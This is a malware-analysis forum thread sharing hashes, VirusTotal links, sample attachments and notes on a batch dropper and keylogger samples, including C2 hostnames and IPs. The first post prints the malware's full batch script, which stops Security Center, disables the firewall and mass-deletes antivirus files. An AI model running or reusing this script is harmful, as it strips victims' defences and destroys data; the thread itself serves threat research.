A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19470  by EP_X0FF
 Thu May 30, 2013 2:12 am
MMPC description http://www.microsoft.com/security/porta ... adabindi.G

SHA256: e2dee10881ceafddf3fc8fbe16c4fc1b14898c52e34b985cd7b0ef7b531e38df
SHA1: 5af0c48c88da182d337c60c0ba1f0dd067c93df6
MD5: 4f80ed5be19fdf11d1fb27240640ba40

https://www.virustotal.com/en/file/e2de ... 369879627/

script-kiddie trash

batch included
Code: Select all
echo offnet stop “Security Center”netsh firewall set opmode mode=disabledel E-*del av*del fire*del anti*del spy*del bullguarddel PersFwdel KAV*del UfseAgnt*del Spy*del ZONEALARMdel SAFE***del OUTPOST*del nv*del nav*del F-*del cle*del BLACKICEdel def*del kav*del avg*del ash*del aswupdsvdel ewid*del guard*del guar*del gcasDt*del msmp*del mcafe*del mghtmldel msiexecdel *safe*del zap*del zauinstdel upd*del zlclien*del minilogdel cc*del norton*del norton au*del ccc*del npfmn*del loge*del nisum*del issvcdel tmp*del tmn*del pcc*del cpd*del pop*del pav*del padmindel panda*del avsch*del sche*del syman*del *virus*del realm*del sweep*del scan*del ad-*del safe*del avas*del norm*del offg*del /Q /F %ProgramFiles%\alwils~1\avast4\*.*del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\******del /Q /F %ProgramFiles%\kasper~1\******del /Q /F %ProgramFiles%\trojan~1\******del /Q /F %ProgramFiles%\f-prot95\*.*del /Q /F %ProgramFiles%\tbav\*.datdel /Q /F %ProgramFiles%\avpersonal\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\Mcafee\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\avgamsr\******del /Q /F %ProgramFiles%\avgamsvr\******del /Q /F %ProgramFiles%\avgemc\******del /Q /F %ProgramFiles%\avgcc\******del /Q /F %ProgramFiles%\avgupsvc\******del /Q /F %ProgramFiles%\grisoftdel /Q /F %ProgramFiles%\nood32krn\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\nod32\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\kav\******del /Q /F %ProgramFiles%\kavmm\******del /Q /F %ProgramFiles%\kaspersky\*.*del /Q /F %ProgramFiles%\ewidoctrl\******del /Q /F %ProgramFiles%\guard\******del /Q /F %ProgramFiles%\ewido\******del /Q /F %ProgramFiles%\pavprsrv\******del /Q /F %ProgramFiles%\pavprot\******del /Q /F %ProgramFiles%\avengine\******del /Q /F %ProgramFiles%\apvxdwin\******del /Q /F %ProgramFiles%\avira\******del /Q /F %ProgramFiles%\panda software
Attachments
pass: infected
(57.6 KiB) Downloaded 148 times
 #20440  by rough_spear
 Fri Aug 09, 2013 8:13 pm
Hi All,

This malware has an excellent capability of key logging.After execution it drops file java.exe in %temp%

and created java.exe.tmp file where it actually stores all the key strokes from user.

MD5 - 30E363C63AB1BA3BA87AD281E31CA223

VT link - https://www.virustotal.com/en/file/ed87 ... /analysis/

Regards,

rough_spear. ;)
Attachments
password - infected.
(15.41 KiB) Downloaded 105 times
 #21535  by patriq
 Mon Dec 02, 2013 8:49 pm
Xylitol wrote:https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.
Image
Thats pretty funny.

Fuck anti-VM, they just gonna start putting anti-"Xyl" detection soon. Lol. :D

Good stuff as usual man.


That java.exe sample was hosted at hxxp://silver13.net/
A few more samples from the same server, attached.
Low detection rates..still some MSIL .net crap
Code: Select all
sub.exe
560FFF8CCFA8AE563F00483659659F78

dex.exe
C5A4103DF0A10F19916CCCBB0E989D14	

doc.exe
3262D5E2855FEF2C9263A47DEE2AC3A5

(from VxVault)
thought that dex.exe (C5A4103DF0A10F19916CCCBB0E989D14) would be a Dexter sample, since you caught him on a POS machine before..but looks like "SecureDll.dll" loading into IE address space..I think its just formgrabber/keylogger ability. Anyone confirm?

probable spot where key strokes are stored
Code: Select all
HKEY_CURRENT_USER\Software\HelperSolutions Software
"%System%\strokes.log"
notes about the servers this "hacker" uses in this campaign:
Code: Select all
silver13.net.		158.58.173.181 - RIPE-ERX NL
silver13.no-ip.biz.	197.15.207.77  - Agence Tunisienne Internet
Attachments
infected
(372.37 KiB) Downloaded 91 times